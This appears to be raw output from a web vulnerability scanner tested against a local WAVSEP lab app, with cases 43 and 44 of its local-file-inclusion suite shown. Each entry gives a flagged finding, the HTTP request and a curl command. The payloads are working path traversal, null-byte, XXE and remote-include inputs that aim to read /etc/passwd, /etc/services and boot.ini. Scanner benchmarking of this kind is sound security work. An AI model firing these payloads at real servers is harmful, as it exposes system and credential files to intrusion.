curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
